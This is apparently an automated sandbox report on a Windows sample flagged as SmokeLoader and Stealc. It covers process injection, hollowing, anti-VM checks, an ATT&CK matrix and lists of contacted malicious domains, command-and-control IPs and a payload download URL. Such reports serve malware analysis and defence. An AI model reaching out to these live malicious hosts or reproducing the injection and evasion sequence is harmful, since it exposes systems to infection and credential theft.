Source: explorer.exe, 00000001.00000000.1765272332.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1766706025.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1769319687.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}exeF8b
Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A092B mov eax, dword ptr fs:[00000030h]	0_2_004A092B
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A0D90 mov eax, dword ptr fs:[00000030h]	0_2_004A0D90
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00536C8B push dword ptr fs:[00000030h]	0_2_00536C8B
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_005B092B mov eax, dword ptr fs:[00000030h]	5_2_005B092B
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_005B0D90 mov eax, dword ptr fs:[00000030h]	5_2_005B0D90
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_007A71A3 push dword ptr fs:[00000030h]	5_2_007A71A3

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: busaafd.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 102.189.104.201 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 191.96.144.157 443			Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: D931.exe PID: 7888, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Code function: 7_2_030AA090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

7_2_030AA090

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Thread created: C:\Windows\explorer.exe EIP: 31619B0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Thread created: unknown EIP: 87C19B0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\D931.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe

Jump to behavior

Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765127718.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1764166403.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe

Code function: 0_2_0041A7A0 InterlockedExchange,SetConsoleTitleA,GlobalSize,FindAtomW,SearchPathW,SetConsoleMode,GetDefaultCommConfigW,CopyFileExA,GetEnvironmentStringsW,WriteConsoleOutputW,GetNumaNodeProcessorMask,DebugActiveProcessStop,GetUserDefaultLangID,RtlLeaveCriticalSection,LoadLibraryA,GetSystemTimes,FoldStringW,GetConsoleAliasesLengthA,CallNamedPipeA,GetComputerNameA,GetConsoleAliasExesLengthW,GlobalAlloc,LoadLibraryW,GlobalSize,InterlockedDecrement,

0_2_0041A7A0

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	812 Process Injection	11 Masquerading	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 DLL Side-Loading	3 Virtualization/Sandbox Evasion	LSASS Memory	421 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	812 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
e0OOofAl0S.exe	43%	Virustotal		Browse
e0OOofAl0S.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\busaafd	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D931.exe	38%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\svchost015.exe	4%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
epohe.ru	2%	Virustotal		Browse
free.cdn.hstgr.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://aka.ms/odirmr	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://api.msn.com/q	0%	URL Reputation	safe
https://www.ssl.com/repository0	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://github.com/tesseract-ocr/tessdata/	0%	Avira URL Cloud	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?&	0%	URL Reputation	safe
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://www.x-ways.net/winhex/subscribe-d.htmlU	0%	Avira URL Cloud	safe
https://api.msn.com/	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
http://www.x-ways.net/order	0%	Avira URL Cloud	safe
http://nicetolosv.xyz/tmp/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	Avira URL Cloud	safe
http://www.x-ways.net/winhex/subscribe-d.htmlU	1%	Virustotal		Browse
http://olihonols.in.net/tmp/	0%	Avira URL Cloud	safe
https://github.com/tesseract-ocr/tessdata/	0%	Virustotal		Browse
http://91.202.233.158/	100%	Avira URL Cloud	malware
http://91.202.233.158/W	100%	Avira URL Cloud	malware
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.php	100%	Avira URL Cloud	malware
http://nicetolosv.xyz/tmp/	1%	Virustotal		Browse
http://www.x-ways.net/order	0%	Virustotal		Browse
http://www.x-ways.net/order.html-d.htmlS	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	0%	Avira URL Cloud	safe
http://91.202.233.158	100%	Avira URL Cloud	malware
http://91.202.233.158/	18%	Virustotal		Browse
https://www.x-ways.net/winhex/forum/	0%	Avira URL Cloud	safe
http://olihonols.in.net/tmp/	2%	Virustotal		Browse
http://www.x-ways.net/order.html-d.htmlS	1%	Virustotal		Browse
http://www.x-ways.net/winhex/license-d-f.htmlS	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.php	5%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.phpB	100%	Avira URL Cloud	malware
http://91.202.233.158	18%	Virustotal		Browse
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	0%	Avira URL Cloud	safe
http://jftolsa.ws/tmp/	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://www.x-ways.net/forensics/x-tensions.html	0%	Avira URL Cloud	safe
http://www.x-ways.net/winhex/license-d-f.htmlS	1%	Virustotal		Browse
https://www.x-ways.net/winhex/forum/	0%	Virustotal		Browse
https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe	0%	Avira URL Cloud	safe
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	0%	Avira URL Cloud	safe
http://jftolsa.ws/tmp/	1%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://www.x-ways.net/winhex/subscribe	0%	Avira URL Cloud	safe
https://www.x-ways.net/forensics/x-tensions.htmlf	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	Avira URL Cloud	safe
https://www.x-ways.net/forensics/x-tensions.html	1%	Virustotal		Browse
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	1%	Virustotal		Browse
http://91.202.233.158/ws	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	Avira URL Cloud	safe
http://www.x-ways.net/winhex/subscribe	0%	Virustotal		Browse
http://epohe.ru/tmp/	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpg	100%	Avira URL Cloud	malware
https://www.x-ways.net/forensics/x-tensions.htmlf	1%	Virustotal		Browse
https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe	0%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.phpm	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	0%	Avira URL Cloud	safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	0%	Avira URL Cloud	safe
http://91.202.233.158i	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
epohe.ru	102.189.104.201	true	true	2%, Virustotal, Browse	unknown
free.cdn.hstgr.net	191.96.144.157	true	true	0%, Virustotal, Browse	unknown
www.darkviolet-alpaca-923878.hostingersite.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nicetolosv.xyz/tmp/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://olihonols.in.net/tmp/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.158/	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://jftolsa.ws/tmp/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://epohe.ru/tmp/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://ocsps.ssl.com0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
https://github.com/tesseract-ocr/tessdata/	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/subscribe-d.htmlU	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1766257805.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1767359707.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1765907916.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/order	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/W	svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/order.html-d.htmlS	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ssl.com/repository0	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	false	URL Reputation: safe	unknown
http://91.202.233.158	svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.x-ways.net/winhex/forum/	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/license-d-f.htmlS	D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1768511521.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpB	svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
